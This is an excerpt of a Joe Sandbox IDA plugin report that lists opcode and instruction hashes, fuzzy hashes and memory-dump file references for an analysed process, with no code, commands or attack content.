                                                                                    • API String ID:
                                                                                    • Opcode ID: 14536fca1f33b8c647bc5e8206aad668550b14580c2e5c0fdfcc768c6f476dd4
                                                                                    • Instruction ID: f22fb4c34cd5df4a3edf5c233920121a06794c4822fb2958e5ecec7cf5b4e2e1
                                                                                    • Opcode Fuzzy Hash: 14536fca1f33b8c647bc5e8206aad668550b14580c2e5c0fdfcc768c6f476dd4
                                                                                    • Instruction Fuzzy Hash: 8501A87090894D9FDF84EF58C448AAE7BF0FF68345F00056AE419D3250DB30E590CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 334b2377489a0dc5721c69cf661d138a29f6afdc2e7b34a77a5b9a8833d3bbcd
                                                                                    • Instruction ID: 638cd4ef5731e830bb5bad1b56fc9385441351d0ef8cb3de1ea168d9b94ae45d
                                                                                    • Opcode Fuzzy Hash: 334b2377489a0dc5721c69cf661d138a29f6afdc2e7b34a77a5b9a8833d3bbcd
                                                                                    • Instruction Fuzzy Hash: 99F0C27090878D8FDB54EF2884896EE7FF0FF24342F5000AAE808C6151E73595A0CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fb2b1ddd9816ff73de882e7728606354b8449134218a45aa18022d79502ce79
                                                                                    • Instruction ID: e46a97feb274d16faf3beed2d23df0d0be9c1fb1f8b3ad28e75f5c9a522c46e8
                                                                                    • Opcode Fuzzy Hash: 0fb2b1ddd9816ff73de882e7728606354b8449134218a45aa18022d79502ce79
                                                                                    • Instruction Fuzzy Hash: 9301B670914A4D9FDF84EF68C848AAEBBF0FB68305F10056AA41DD7250DB31A5A0CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3aba9669679d8961e2c6eb51c49a568fe37d7e9a795f76c055e1e6f79901b66e
                                                                                    • Instruction ID: 1317ca55747f71aa43fcbdaef6a38be72207516f7e275e4b887dc67d645d49d3
                                                                                    • Opcode Fuzzy Hash: 3aba9669679d8961e2c6eb51c49a568fe37d7e9a795f76c055e1e6f79901b66e
                                                                                    • Instruction Fuzzy Hash: 1E01967490895DCFCF59EF98C898AACBBB1FF68345F240199C00AEB651C631A841DB00
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 283c8f1185c55defe175e5fc2e495ad6040c0fb854710b61a9474341b6b78e8a
                                                                                    • Instruction ID: 523e2de58bc770f31f3dd6a50f51944ba22208ded4a5fbd907e15c2e525116ca
                                                                                    • Opcode Fuzzy Hash: 283c8f1185c55defe175e5fc2e495ad6040c0fb854710b61a9474341b6b78e8a
                                                                                    • Instruction Fuzzy Hash: 02F04F30918A4D9FDF85EF58D889AEABBF0FF28305F1001AAE40DC7191DB35A594CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 63d19bb5c36f73d5ff15bee9b54583d362b3a4d64946519479ac5010cf2c9334
                                                                                    • Instruction ID: ede556b488143d1b5bc89f080902c9b5abee7b82b405839869c912b23114b184
                                                                                    • Opcode Fuzzy Hash: 63d19bb5c36f73d5ff15bee9b54583d362b3a4d64946519479ac5010cf2c9334
                                                                                    • Instruction Fuzzy Hash: B0F0623184E3C99FD722EF7089565E57FA4AF43244B1800FAE4458B0A2D66D5616C761
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: be1dc21298d0dac8bfe3e139a56e7b83fbae7db44d8be74848caf7df2d147990
                                                                                    • Instruction ID: c033fd9b1ea17d7377712169d4df24955f8a21c66a693a8b86b3aaff56b90073
                                                                                    • Opcode Fuzzy Hash: be1dc21298d0dac8bfe3e139a56e7b83fbae7db44d8be74848caf7df2d147990
                                                                                    • Instruction Fuzzy Hash: 12F06D70914A8D9FDF44EF68C8496EA7BE0FF18305F0005AAE809C3250DB34E5A0CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c25525d9aeffc3ab68c4d46dff46aa2b5142bfc9c9cc408874176caf790db571
                                                                                    • Instruction ID: 1a928e778dd5addd58c0a7ef5c20a70d0d618856377f896cf4d9fc2bb4ad2440
                                                                                    • Opcode Fuzzy Hash: c25525d9aeffc3ab68c4d46dff46aa2b5142bfc9c9cc408874176caf790db571
                                                                                    • Instruction Fuzzy Hash: EAF01D30914A4D9FDB50EF28C549AEE7BE0FF28305F00057AE819D3151DB34A5A0CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                                    • Instruction ID: 29da9ab3e3621f55c026e5c541d3b753d46ac60d7af7fbf71df87d3a2c267692
                                                                                    • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                                    • Instruction Fuzzy Hash: 7BF0D47490A998DFCF55EBA8C85AE99BBB0FF68300F1001DDD04ADB262CA319845CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fa13fbac5bd474bc629db50e0645a91d46ff6e508bf7a05f17f594eb887c466a
                                                                                    • Instruction ID: eb1f57f5f99e34ba8b37ed2dfe8c5a21f97f9d83973fb600aec64845506aa8b5
                                                                                    • Opcode Fuzzy Hash: fa13fbac5bd474bc629db50e0645a91d46ff6e508bf7a05f17f594eb887c466a
                                                                                    • Instruction Fuzzy Hash: F6E04F30408A4E8FDB94EF18E9052EA77A0FF54340F40052AE81CC2180DB74A974C781
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c5d48ee350b63896b462a989aa40031aa0f6b8c48f8fd4422c10e4405d7da408
                                                                                    • Instruction ID: 0ac5f6f7292b6e82acbb7380fcd3a4e63c293c959f23143e2295d982ce1fe3ae
                                                                                    • Opcode Fuzzy Hash: c5d48ee350b63896b462a989aa40031aa0f6b8c48f8fd4422c10e4405d7da408
                                                                                    • Instruction Fuzzy Hash: F1E04F3681E2C98FE771FF108A560EC7F61BF51380F5801E7D509471D2EB696A189643
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3414891600.00007FF849970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849970000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849970000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf8114f06595e96dee36729274198561db79f95b912ce328a1baf71950b18ff8
                                                                                    • Instruction ID: 2ae1279829a0bd1a02605f694f65de02a9959a19884df55f0d571c46c62270bd
                                                                                    • Opcode Fuzzy Hash: cf8114f06595e96dee36729274198561db79f95b912ce328a1baf71950b18ff8
                                                                                    • Instruction Fuzzy Hash: E1E01A3050C98ECFDBA8EE04C0A5ABE3BA6FF05304F200478D01A871C6CA39A943CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3394537061.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff848f20000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 86fc17622c82c203106c06e5f086be71ed1dee3a62eb1b61c85d1a9fec64c22b
                                                                                    • Instruction ID: 3384925cb585d249f9e8cb4780e4e954f535b1e1697bdb5ef0569bde6b6a94df
                                                                                    • Opcode Fuzzy Hash: 86fc17622c82c203106c06e5f086be71ed1dee3a62eb1b61c85d1a9fec64c22b
                                                                                    • Instruction Fuzzy Hash: ADE0EC70E0981D9ED771EB1CDC503EA7671EF84311F1042F9800E96289CE352EC28F80
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3414891600.00007FF849970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849970000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849970000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 354efb1a34bd638befae4fbad5fb8ff4ae5106053fb95bcbbba5504f0771aaba
                                                                                    • Instruction ID: a7b2c466b46e6b784bdf5199d3a58d3cb90cb90bb8864e7d8d2e63e0c7301198
                                                                                    • Opcode Fuzzy Hash: 354efb1a34bd638befae4fbad5fb8ff4ae5106053fb95bcbbba5504f0771aaba
                                                                                    • Instruction Fuzzy Hash: 86D0677461CA8E8FDB94EE0DD885EAA77E1FF64700F104561E425C725ACA34F852CB84
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                                    • Instruction ID: 257950247b19507d603f3444a53f00012563ea463f4218fa658a39c8151ac4d2
                                                                                    • Opcode Fuzzy Hash: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                                    • Instruction Fuzzy Hash: 5ED01214A0D6D7CDF2397FC18070E3EA1D06F05781E22483EC16F818C1CE1D7601AE01
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                                    • Instruction ID: 58f5180c06c67a949dcfe7f39bd44abea5061375aa129419e7db65b443bea11d
                                                                                    • Opcode Fuzzy Hash: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                                    • Instruction Fuzzy Hash: 5BD01270A1C5D38DF33A7F41853833E66A19F513C1E60003ED09F4A8C6CD2CB801661A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3407012936.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849620000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                                    • Instruction ID: 637081ded260ab0185f178d8be119af1f28134a5f97684c05d420111f9e832d9
                                                                                    • Opcode Fuzzy Hash: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                                    • Instruction Fuzzy Hash: 17C04C14F0D2D39FE6317BB4585193926901F0B288B150971D51A8A2C3D85C78846A95
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3414891600.00007FF849970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849970000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849970000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 66aa4c200db1796274454cbc0dc2ba29befef5da94aecac3351e330d828675db
                                                                                    • Instruction ID: 1906c89b3c65503116b3426c8b94c9f59264b843d42ec5f0b8143f7138a1e36d
                                                                                    • Opcode Fuzzy Hash: 66aa4c200db1796274454cbc0dc2ba29befef5da94aecac3351e330d828675db
                                                                                    • Instruction Fuzzy Hash: C8217C3184E3C24FD753AB708C681907FB0EF57210B0A42EBC095CB0E3DA5C285AD722
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3394537061.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff848f20000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 8eb83324625cd40c4f579d185c5d7fcd0bd0c7a3cd5ab0727e1d0e96d320d8d6
                                                                                    • Instruction ID: 0681076a377dcda6742e77cbd2865407bc82f9de8890ac9bb63ac41a2e4d4c9f
                                                                                    • Opcode Fuzzy Hash: 8eb83324625cd40c4f579d185c5d7fcd0bd0c7a3cd5ab0727e1d0e96d320d8d6
                                                                                    • Instruction Fuzzy Hash: 88414D17A2F562AAE15137BDB4412EEABA4EF812BDF484777E14C8D0C34E0C648582FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.3412161677.00007FF849860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849860000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_7ff849860000_BSlvAOjamepaXWJMhY.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: +$0$0${
                                                                                    • API String ID: 0-1355733333
                                                                                    • Opcode ID: fd83137e0f47ee8fb01aefb0e52161e1566107bbd2152f814b53763caa69c259
                                                                                    • Instruction ID: 82579a0ef524c45cde0be80782be029cab82337349c2010f01b202fc81e56574
                                                                                    • Opcode Fuzzy Hash: fd83137e0f47ee8fb01aefb0e52161e1566107bbd2152f814b53763caa69c259
                                                                                    • Instruction Fuzzy Hash: AE114F70D08299CFEB64EF49C444BAC73F1EF44345F0085BAC41AAB280C7795986CF40